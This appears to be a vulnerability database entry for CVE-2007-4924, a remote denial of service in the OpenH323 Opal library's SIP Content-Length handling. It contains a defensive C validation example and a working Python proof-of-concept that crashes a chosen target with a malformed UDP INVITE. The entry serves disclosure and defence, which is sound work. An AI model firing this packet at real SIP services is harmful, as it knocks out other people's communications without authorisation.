OpenH323 Opal Library SIP Protocol Remote Denial of Service Vulnerability

Vulnerability ID: 1118183    Vulnerability type: Input validation
Published: 2009-07-24    Updated: 2009-07-27
CVE ID: CVE-2007-4924    CNNVD-ID: CNNVD-200710-134
Platform: Windows    CVSS score: 5.0
|Vulnerability source
https://www.exploit-db.com/exploits/9240
https://www.securityfocus.com/bid/25955
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200710-134
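|Vulnerability details
OpenH323 is a full-featured protocol stack designed for developing applications that use the H.323 protocol for multimedia communication over IP networks. The OpenH323 implementation has a flaw in how it handles malformed SIP messages, which a remote attacker may exploit to crash the user's system. The SIP_PDU::Read() method in the sip/sippdu.cxx file of the opal library used by OpenH323 does not correctly handle the Content-Length field in the SIP message header. If a remote attacker sends a malformed SIP message to an application that uses the library, a "\0" byte may be written to an arbitrary memory location, resulting in a denial of service.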
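The check whose absence is described above, as an added defensive example in C. It is not Opal's code or the upstream patch, and the function names are hypothetical. It goes slightly beyond the page by also accepting the compact `l:` header form and by treating a missing header on a datagram as "body runs to the end of the packet", the RFC 3261 rule for UDP; it assumes no whitespace before the colon.

```c
#include <ctype.h>
#include <limits.h>
#include <string.h>

/* Case-insensitive match of a lowercase header prefix such as "content-length:". */
static int is_hdr(const char *line, size_t len, const char *name)
{
    size_t n = strlen(name);
    if (len < n) return 0;
    for (size_t i = 0; i < n; i++)
        if (tolower((unsigned char)line[i]) != name[i]) return 0;
    return 1;
}

/* Digits only: a leading '-' or '+', junk, an empty value or overflow gives -1. */
static long parse_len(const char *p, const char *lim)
{
    long v = 0;
    while (p < lim && (*p == ' ' || *p == '\t')) p++;
    if (p == lim) return -1;
    for (; p < lim; p++) {
        if (*p < '0' || *p > '9') return -1;
        if (v > (LONG_MAX - (*p - '0')) / 10) return -1;
        v = v * 10 + (*p - '0');
    }
    return v;
}

/* Body length safe to use for one datagram, or -1 to drop it (msg need not be NUL-terminated). */
long sip_checked_content_length(const char *msg, size_t msg_len)
{
    const char *end = msg + msg_len, *line = msg;
    long declared = -1;                       /* -1: header not seen yet */
    while (line < end) {
        const char *eol = memchr(line, '\n', (size_t)(end - line));
        if (eol == NULL) return -1;           /* header block never terminated */
        size_t len = (size_t)(eol - line);
        if (len > 0 && line[len - 1] == '\r') len--;
        if (len == 0) {                       /* blank line: body follows */
            long avail = (long)(end - (eol + 1));
            if (declared < 0) return avail;   /* no header: body runs to end of datagram */
            return declared <= avail ? declared : -1;
        }
        const char *val = is_hdr(line, len, "content-length:") ? line + 15
                        : is_hdr(line, len, "l:") ? line + 2 : NULL;
        if (val != NULL && (declared = parse_len(val, line + len)) < 0) return -1;
        line = eol + 1;
    }
    return -1;                                /* no blank line after the headers */
}
```

A caller uses the returned value, never the raw header, to size and terminate the body buffer, and drops the message on -1.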
|Exploit
#!/usr/bin/env python
#
# OpenH323 Opal SIP Protocol Remote Denial of Service Vulnerability (CVE-2007-4924)
#
# opal228_dos.py by Jose Miguel Esparza
# 2007-10-08 S21sec labs

import sys,socket

if len(sys.argv) != 3:
	sys.exit("Usage: " + sys.argv[0] + " target_host target_port\n")
target = sys.argv[1]
targetPort = int(sys.argv[2])
malformedRequest = "INVITE sip:paco@192.168.1.134 SIP/2.0\r\n"+\
                   "Call-ID:f81d4fae-7dec-11d0-a765-00a0c91e6bf6@foo.bar.com\r\n"+\
                   "Contact:sip:pepe@192.168.1.133:5060\r\n"+\
                   "Content-Length:-40999990\r\n"+\
                   "Content-Type:application/sdp\r\n"+\
                   "CSeq:4321 INVITE\r\n"+\
                   "From:sip:pepe@192.168.1.133:5060;tag=a48s\r\n"+\
                   "Max-Forwards:70\r\n"+\
                   "To:sip:paco@micasa.com\r\n"+\
                   "Via:SIP/2.0/UDP 192.168.1.133:5060;branch=z9hG4bK74b76\r\n\r\n"

s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
s.connect((target,targetPort))
s.sendall(malformedRequest)
s.close()

# milw0rm.com [2009-07-24]
|Affected products
Ubuntu Ubuntu Linux 7.04 sparc Ubuntu Ubuntu Linux 7.04 powerpc Ubuntu Ubuntu Linux 7.04 i386 Ubuntu Ubuntu Linux 7.04 amd64 Ubuntu Ubuntu Linux 6.10 sparc Ubuntu Ubuntu
|References

Source: REDHAT
Name: RHSA-2007:0957
Link: http://www.redhat.com/support/errata/RHSA-2007-0957.html
Source: SECUNIA
Name: 27129
Link: http://secunia.com/advisories/27129
Source: SECUNIA
Name: 27128
Link: http://secunia.com/advisories/27128
Source: SECUNIA
Name: 27118
Link: http://secunia.com/advisories/27118
Source: MLIST
Name: [ekiga-list] 20070917 [ANNOUNCE] Ekiga 2.0.10 released
Link: http://mail.gnome.org/archives/ekiga-list/2007-September/msg00103.html
Source: bugzilla.redhat.com
Link: https://bugzilla.redhat.com/show_bug.cgi?id=296371
Source: BUGTRAQ
Name: 20071011 S21SEC-037-en: OPAL SIP Protocol Remote Denial of Service
Link: http://www.securityfocus.com/archive/1/archive/1/482120/30/4500/threaded
Source: MISC
Link: http://www.s21sec.com/avisos/s21sec-037-en.txt
Source: MILW0RM
Name: 9240
Link: http://www.milw0rm.com/exploits/9240
Source: OSVDB
Name: 41637
Link: http://osvdb.org/41637
Source: openh323.cvs.sourceforge.net
Link: http://openh323.cvs.sourceforge.net/openh323/opal/src/sip/sippdu.cxx?r1=2.83.2.19&r2=2.83.2.20
Source: UBUNTU
Name: USN-562-1
Link: http://www.ubuntu.com/usn/usn-562-1
Source: SECTRACK
Name: 1018